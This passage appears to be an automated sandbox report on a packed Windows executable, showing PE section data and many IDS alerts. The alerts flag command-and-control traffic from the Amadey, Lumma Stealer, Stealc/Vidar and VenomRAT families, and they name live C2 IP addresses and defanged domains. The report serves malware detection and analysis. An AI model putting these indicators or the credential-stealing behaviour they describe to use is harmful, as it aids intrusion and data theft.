.rsrc	0x69000	0x344	0x400	982623c07c43a8169da5c3bd55ce4d06	False	0.4345703125	data	5.395849414192414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
syfpipoa	0x6b000	0x2b2000	0x2b1c00	de89f444313838c39a8a4f882c2748bc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kqlprvhw	0x31d000	0x1000	0x400	28101f3bd65ae0792778adbc9af325e8	False	0.7939453125	data	6.124208055651814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x31e000	0x3000	0x2200	130e21ef41e474edd54e9d5d1c151e06	False	0.06330422794117647	DOS executable (COM)	0.7936231932797173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x152	ASCII text, with CRLF line terminators			0.6479289940828402
RT_MANIFEST	0x691c4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-14T23:58:05.925422+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49758	185.215.113.43	80	TCP
2024-12-14T23:58:10.385250+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49770	31.41.244.11	80	TCP
2024-12-14T23:58:15.922063+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49764	TCP
2024-12-14T23:58:17.275992+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49786	185.215.113.43	80	TCP
2024-12-14T23:58:17.915573+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49787	104.21.51.88	443	TCP
2024-12-14T23:58:18.624850+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49787	104.21.51.88	443	TCP
2024-12-14T23:58:18.624850+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49787	104.21.51.88	443	TCP
2024-12-14T23:58:18.634606+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.4	51297	1.1.1.1	53	UDP
2024-12-14T23:58:18.723154+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49793	31.41.244.11	80	TCP
2024-12-14T23:58:20.104742+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:20.104742+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:20.826404+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:20.826404+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49794	104.21.22.222	443	TCP
2024-12-14T23:58:20.931864+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.4	63330	1.1.1.1	53	UDP
2024-12-14T23:58:22.464679+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:22.464679+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:23.450936+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:23.450936+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49800	104.21.64.1	443	TCP
2024-12-14T23:58:23.524465+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	58198	1.1.1.1	53	UDP
2024-12-14T23:58:23.779230+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	62953	1.1.1.1	53	UDP
2024-12-14T23:58:24.004103+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	64201	1.1.1.1	53	UDP
2024-12-14T23:58:24.225217+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	50054	1.1.1.1	53	UDP
2024-12-14T23:58:24.454768+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	54192	1.1.1.1	53	UDP
2024-12-14T23:58:24.676450+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	61711	1.1.1.1	53	UDP
2024-12-14T23:58:25.565495+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49811	185.215.113.43	80	TCP
2024-12-14T23:58:26.503381+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49812	104.102.49.254	443	TCP
2024-12-14T23:58:27.041923+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49813	185.215.113.16	80	TCP
2024-12-14T23:58:27.370033+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49812	104.102.49.254	443	TCP
2024-12-14T23:58:30.537205+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	87.120.127.228	7777	192.168.2.4	49824	TCP
2024-12-14T23:58:30.537205+0100	2052265	ET MALWARE Observed Malicious SSL Cert (VenomRAT)	1	87.120.127.228	7777	192.168.2.4	49824	TCP
2024-12-14T23:58:34.649189+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49835	185.215.113.43	80	TCP
2024-12-14T23:58:35.160017+0100	2058230	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)	1	192.168.2.4	50952	1.1.1.1	53	UDP
2024-12-14T23:58:36.118246+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49841	185.215.113.16	80	TCP
2024-12-14T23:58:36.725256+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:36.725256+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:37.802180+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:37.802180+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49842	104.21.50.161	443	TCP
2024-12-14T23:58:39.037384+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:39.037384+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:39.759683+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:39.759683+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49848	104.21.22.222	443	TCP
2024-12-14T23:58:40.998120+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:40.998120+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:41.718688+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:41.718688+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49854	104.21.64.1	443	TCP
2024-12-14T23:58:41.722447+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	55133	1.1.1.1	53	UDP
2024-12-14T23:58:41.937619+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	63719	1.1.1.1	53	UDP
2024-12-14T23:58:42.212484+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	55911	1.1.1.1	53	UDP
2024-12-14T23:58:42.354869+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	56804	1.1.1.1	53	UDP
2024-12-14T23:58:42.495272+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	53913	1.1.1.1	53	UDP
2024-12-14T23:58:42.635456+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	53689	1.1.1.1	53	UDP
2024-12-14T23:58:43.005634+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49861	185.215.113.43	80	TCP
2024-12-14T23:58:43.017758+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49855	185.215.113.206	80	TCP
2024-12-14T23:58:43.459694+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49855	185.215.113.206	80	TCP
2024-12-14T23:58:43.947859+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49855	TCP
2024-12-14T23:58:44.286223+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49855	185.215.113.206	80	TCP
2024-12-14T23:58:44.383854+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49862	104.102.49.254	443	TCP
2024-12-14T23:58:44.423128+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49855	TCP
2024-12-14T23:58:44.470217+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49863	185.215.113.16	80	TCP
2024-12-14T23:58:45.806518+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49862	104.102.49.254	443	TCP
2024-12-14T23:58:45.925768+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49855	185.215.113.206	80	TCP
2024-12-14T23:58:46.654321+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49855	185.215.113.206	80	TCP
2024-12-14T23:58:50.069782+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:58:50.069782+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:58:50.258057+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49879	185.215.113.43	80	TCP
2024-12-14T23:58:51.271988+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:58:51.271988+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49880	104.21.50.161	443	TCP
2024-12-14T23:58:51.938607+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49881	185.215.113.16	80	TCP
2024-12-14T23:58:52.505951+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:58:52.505951+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:58:53.194435+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:58:53.194435+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49896	104.21.22.222	443	TCP
2024-12-14T23:58:54.488858+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:58:54.488858+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:58:55.203538+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:58:55.203538+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49907	104.21.64.1	443	TCP
2024-12-14T23:58:55.205148+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	61251	1.1.1.1	53	UDP
2024-12-14T23:58:55.742280+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	61029	1.1.1.1	53	UDP
2024-12-14T23:58:55.882416+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	57023	1.1.1.1	53	UDP
2024-12-14T23:58:56.026105+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	63919	1.1.1.1	53	UDP
2024-12-14T23:58:56.197880+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	61286	1.1.1.1	53	UDP
2024-12-14T23:58:56.338439+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	64295	1.1.1.1	53	UDP
2024-12-14T23:58:58.074300+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49923	104.102.49.254	443	TCP
2024-12-14T23:58:59.066733+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49923	104.102.49.254	443	TCP
2024-12-14T23:59:00.270580+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49932	185.215.113.43	80	TCP
2024-12-14T23:59:01.735841+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49938	31.41.244.11	80	TCP
2024-12-14T23:59:04.349206+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:06.500296+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:08.056661+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:09.576175+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:12.699944+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49976	185.215.113.43	80	TCP
2024-12-14T23:59:13.433508+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:14.166024+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49983	31.41.244.11	80	TCP
2024-12-14T23:59:14.759625+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49921	185.215.113.206	80	TCP
2024-12-14T23:59:19.813585+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49994	185.215.113.43	80	TCP
2024-12-14T23:59:21.269034+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50000	31.41.244.11	80	TCP
2024-12-14T23:59:21.644724+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50001	185.215.113.16	80	TCP
2024-12-14T23:59:21.989243+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50002	104.21.79.7	443	TCP
2024-12-14T23:59:22.696813+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50002	104.21.79.7	443	TCP
2024-12-14T23:59:22.696813+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50002	104.21.79.7	443	TCP
2024-12-14T23:59:22.881975+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.4	62039	1.1.1.1	53	UDP
2024-12-14T23:59:22.881975+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.4	62039	1.1.1.1	53	UDP
2024-12-14T23:59:23.028866+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.4	65489	1.1.1.1	53	UDP
2024-12-14T23:59:23.028866+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.4	65489	1.1.1.1	53	UDP
2024-12-14T23:59:23.169594+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.4	64519	1.1.1.1	53	UDP
2024-12-14T23:59:23.169594+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.4	64519	1.1.1.1	53	UDP
2024-12-14T23:59:23.321530+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.4	53232	1.1.1.1	53	UDP
2024-12-14T23:59:23.321530+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.4	53232	1.1.1.1	53	UDP
2024-12-14T23:59:23.463564+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.4	58458	1.1.1.1	53	UDP
2024-12-14T23:59:23.463564+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.4	58458	1.1.1.1	53	UDP
2024-12-14T23:59:23.606813+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.4	62999	1.1.1.1	53	UDP
2024-12-14T23:59:23.606813+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.4	62999	1.1.1.1	53	UDP
2024-12-14T23:59:23.747550+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.4	56333	1.1.1.1	53	UDP
2024-12-14T23:59:23.747550+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.4	56333	1.1.1.1	53	UDP
2024-12-14T23:59:23.893350+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.4	58663	1.1.1.1	53	UDP
2024-12-14T23:59:23.893350+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.4	58663	1.1.1.1	53	UDP
2024-12-14T23:59:25.413552+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-14T23:59:25.413552+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-14T23:59:25.619516+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50017	104.102.49.254	443	TCP
2024-12-14T23:59:26.125062+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-14T23:59:26.125062+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50018	104.21.50.161	443	TCP
2024-12-14T23:59:26.176460+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50019	185.215.113.43	80	TCP
2024-12-14T23:59:26.491191+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	50017	104.102.49.254	443	TCP
2024-12-14T23:59:27.357508+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:27.357508+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:28.066356+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:28.066356+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50026	104.21.22.222	443	TCP
2024-12-14T23:59:29.426005+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:29.426005+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:30.154778+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:30.154778+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50033	104.21.64.1	443	TCP
2024-12-14T23:59:30.157395+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	50460	1.1.1.1	53	UDP
2024-12-14T23:59:30.604411+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	49865	1.1.1.1	53	UDP
2024-12-14T23:59:30.744652+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	64995	1.1.1.1	53	UDP
2024-12-14T23:59:30.886567+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	57508	1.1.1.1	53	UDP
2024-12-14T23:59:31.026293+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	52538	1.1.1.1	53	UDP
2024-12-14T23:59:31.166029+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	54318	1.1.1.1	53	UDP
2024-12-14T23:59:32.135939+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50043	104.102.49.254	443	TCP
2024-12-14T23:59:32.432532+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50041	TCP
2024-12-14T23:59:33.651144+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50044	185.215.113.206	80	TCP
2024-12-14T23:59:33.794701+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50049	31.41.244.11	80	TCP
2024-12-14T23:59:35.272275+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	50050	116.203.12.241	443	TCP
2024-12-14T23:59:35.272715+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.12.241	443	192.168.2.4	50050	TCP
2024-12-14T23:59:37.574503+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.12.241	443	192.168.2.4	50056	TCP
2024-12-14T23:59:39.357760+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50065	104.21.51.88	443	TCP
2024-12-14T23:59:40.111450+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50065	104.21.51.88	443	TCP
2024-12-14T23:59:40.111450+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50065	104.21.51.88	443	TCP
2024-12-14T23:59:40.873328+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50071	185.215.113.43	80	TCP
2024-12-14T23:59:41.375177+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-14T23:59:41.375177+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-14T23:59:42.067466+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-14T23:59:42.067466+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50077	104.21.22.222	443	TCP
2024-12-14T23:59:42.855301+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50084	185.215.113.206	80	TCP
2024-12-14T23:59:43.299764+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-14T23:59:43.299764+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-14T23:59:44.304774+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-14T23:59:44.304774+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50094	104.21.64.1	443	TCP
2024-12-14T23:59:44.306896+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	62870	1.1.1.1	53	UDP
2024-12-14T23:59:44.447924+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	58197	1.1.1.1	53	UDP
2024-12-14T23:59:44.588090+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	60417	1.1.1.1	53	UDP
2024-12-14T23:59:44.728146+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	51137	1.1.1.1	53	UDP
2024-12-14T23:59:44.870929+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	50641	1.1.1.1	53	UDP
2024-12-14T23:59:45.020404+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	55462	1.1.1.1	53	UDP
2024-12-14T23:59:46.754395+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50113	104.102.49.254	443	TCP
2024-12-14T23:59:47.621233+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	50113	104.102.49.254	443	TCP
